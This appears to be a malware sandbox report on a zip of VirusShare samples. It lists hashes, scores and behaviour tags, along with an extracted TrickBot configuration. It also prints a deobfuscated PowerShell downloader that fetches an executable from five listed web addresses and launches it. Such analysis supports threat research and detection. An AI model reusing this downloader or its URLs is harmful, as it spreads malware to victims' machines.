General

  • Target

    2.zip

  • Size

    7.6MB

  • Sample

    250414-a4lkeaxyew

  • MD5

    a29400d43fde42181d504827b759b313

  • SHA1

    9a408c982ae1d7b5ab3c370b703b368ed795efdf

  • SHA256

    b71968ea01e2c2ed82e28a557f3210f3fde4caf97a1368e520650a8e2f5f459c

  • SHA512

    38b10fada863f94d9ac68301d9c76785cb5eeec0e595a032818aefbae43452908fa4813c29fb054ab5adba040bfd56b58248f09a9fd120a7693b05791e8f6308

  • SSDEEP

    196608:5Xq0WFROFqZk50CYQRQ/MxVLq8/0FWo4ZFSo1JpCGi:5rekqCdSM7W8/YWo4ZlpCGi

Malware Config

Extracted

  • Family

    trickbot

  • Version

    1000501

  • Botnet

    ono33

  • C2

Attributes

  • autorun

    Name: pwgrab

  • ecc_pubkey.base64

    RUNTMzAAAADzIIbbIE3wcze1+xiwwK+Au/P78UrAO8YAHyPvHEwGVKOPphl8QVfrC7x/QaFYeXANw6E4HF7ietEp+7ZVQdWOx8c+HvO0Z2PTUPVbX9HAVrg4h9u1RNfhOHk+YysDLsg=

Extracted

  • Language

    ps1

  • Deobfuscated

    # Unused string assignments are scattered between the real statements as padding.
    $jbjdmrkf = "Wvxojjxy"
    # Name of the dropped payload: 306.exe in the current user's profile directory.
    $kqzvqjcdbdk = "306"
    $gxduocdjcjt = "Bkfkbofippczt"
    $mbkmoong = $env:userprofile + "\\" + $kqzvqjcdbdk + ".exe"
    $uefczpcdfixo = "Rqdkzmydmwtwf"
    $iybnpytfapm = new-object net.webclient
    # Five fallback download locations, tried in order until one succeeds.
    $dqsynahyyvxl = "https://sandiegohomevalues.com/engl/4de-kzsyhu-768611/", "https://www.wenkawang.com/data/bofze0s-7ji4-15/", "https://www.bruidsfotograaf-utrecht.com/wp-includes/QLvFLy/", "http://ma.jopedu.com/img/8z8dl-3xn-655019278/", "http://pay.jopedu.com/ThinkPHP/l9okcguh6-b9nnrh7-96245524/"
    $avvhkoyer = "Zgzbdzymy"
    foreach ($rcrndqfmfme in $dqsynahyyvxl) {
        try {
            $iybnpytfapm.downloadfile($rcrndqfmfme, $mbkmoong)
            $ptiuqrijdklve = "Hwhsmlzs"
            # A file smaller than 30309 bytes is treated as a failed download (error page,
            # takedown notice) and the next URL is tried; otherwise the payload is launched.
            if ((get-item $mbkmoong).length -ge 30309) {
                [diagnostics.process]::start($mbkmoong)
                $lstxssia = "Ypyhvhhw"
                break
                $vnasbffmoq = "Cmgqpgssndib"
            }
        } catch {
        }
URLs

Targets

    • Target

      2/VirusShare_01b55404de50bd1a56343b2f316ff88d

    • Size

      121KB

    • MD5

      01b55404de50bd1a56343b2f316ff88d

    • SHA1

      8a6b9599d3e71c83eaef7f5a23df21b4f41370b1

    • SHA256

      69bd652ace6469311a49a12f66bbbc691bdfc69aba958dd02d928464cbb46609

    • SHA512

      f1ec4bf6768dea2edc53c72dd7c884641a464f4268d21480bb55fbdb1079b8c5c9fb50eab4b29d13acb4a8682ca6ae291341e01b748e228b185676e48df2e598

    • SSDEEP

      3072:JrhJGtDfYtWAh3A8lKl+/63VBwxkbwQXz8lFTnc:JrhJoDfY13KE/qVlNYvnc

    • Score

      3/10

    • Target

      2/VirusShare_1ad9a67240d5775395c45b64dd6529fa

    • Size

      2.9MB

    • MD5

      1ad9a67240d5775395c45b64dd6529fa

    • SHA1

      c653d2c475f639ad68c210e0f9d829344c5663c7

    • SHA256

      3751298058a2a5d0912caa35bfdbafa48ae788647b536e69ad383c7c1990dd9d

    • SHA512

      721b1c577db1cfe5465eaceadf2a7cc9d3f68d341f98d7dcc4bde2ff606f359b6bc917e993f5f05e9897b7957ca2617fa03937c2aea6a8462b86f2e750397c23

    • SSDEEP

      49152:4obi85jFGg0IZHVA/pfa8u0Ikjhd6kss8CYxB52ibDIJZKpYg0Kg9e+KgFTRFO:Vzh6/I8u0IktgkOvxBUibs2Z0ggFdE

    • Score

      3/10

    • Target

      2/VirusShare_2fe5b00079aec2d8369a798230313ec8

    • Size

      125KB

    • MD5

      2fe5b00079aec2d8369a798230313ec8

    • SHA1

      e233595a2ee62f6197fcc7d9088fce3505c38ec0

    • SHA256

      8eb6805a0852b220695175ce81a5b139f1438dc06ea3fc1347b047702880374c

    • SHA512

      d9b4173274b49d7f041aea1a6866d5cc79530360668299385a10f25597b608308a5cb6502363709a7e09e43d30a1df95e1ab72fcc71852c78b51da016c2bbed7

    • SSDEEP

      3072:beKgdzSrG8KyIwLx3phgC1s0rPOWfKNR/:beKUzSLnLx3X3O0r2WfKNJ

    • Score

      10/10

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Target

      2/VirusShare_3f0b1eed4b7b9ae05fab4d949843f103

    • Size

      35KB

    • MD5

      3f0b1eed4b7b9ae05fab4d949843f103

    • SHA1

      e5b9fa0a23f337adae93ed4e8fcd1e9d9db4acba

    • SHA256

      ce21d34bafe338effb8f619936f057084cb45743fce884a1465966d8523a00a8

    • SHA512

      292183a9d0b3e5759453a43bcf34b8b1d09d09523687bfab090dd740a5c70169938904949b1c5a025b40082898dc3ec240ad2ec788b66f256efe5a041f774740

    • SSDEEP

      384:3+WbqwPv/ETzbVwNY/+TU5lHizK+BS3DzxW8M2GzraAzVCIXh3aM:OWbqm/EvZwO2TUrEQDtI2G31lX5

    • Score

      1/10

    • Target

      2/VirusShare_480ef02bb062a57724e1b3e14532a140

    • Size

      32KB

    • MD5

      480ef02bb062a57724e1b3e14532a140

    • SHA1

      5ea2c3fdeb0b399e1805a94d8e6af4ce0de2c63e

    • SHA256

      b2e302356d613a814a41d356a61cee24fc133dd032e4b02d8e29436aedd8d742

    • SHA512

      82587a541bdc570b15402ef33beb14d9681160dc6e520f0c34b3c040658d17a9ced58feaa350f3a6c56eb7236ceb4bd09ba6ece56d13113780a6fe1a5044a99f

    • SSDEEP

      768:9EKOUP0/RXtY+E1dhX2e1kaVsVri7sF9/I70u5M/E5vXuMZmwgCLWarCC:ROc0JTE1dhX2e1kssVri7sng0u5MyXFh

    • Score

      3/10

    • Target

      2/wedding.apk

    • Size

      5.3MB

    • MD5

      7a78191dad2e8baf6b372a4dc864430c

    • SHA1

      92f7a09036d7fc1c4ada288fdb114e5e5dcb09c1

    • SHA256

      7a42d7809fdef76fe0580d09ef6780a96c000d97712236e6550d7fff061e122a

    • SHA512

      28ed1d04180dbf9fa7ea9561ddc112377c7d81f6ee1078ceb2fb93782cb29ff875bafc03f5906379f87060132d048ff1802748a97eb7cde9647893e5550c2c8d

    • SSDEEP

      98304:dTUWQ8/rUKDzU87SWbFnVNyYdOYmwKOQarbcDSaBd2ZrYub+4XD:dTLHPSw7Nd8v0rr3aX4XD

    • Score

      1/10

MITRE ATT&CK Enterprise v16
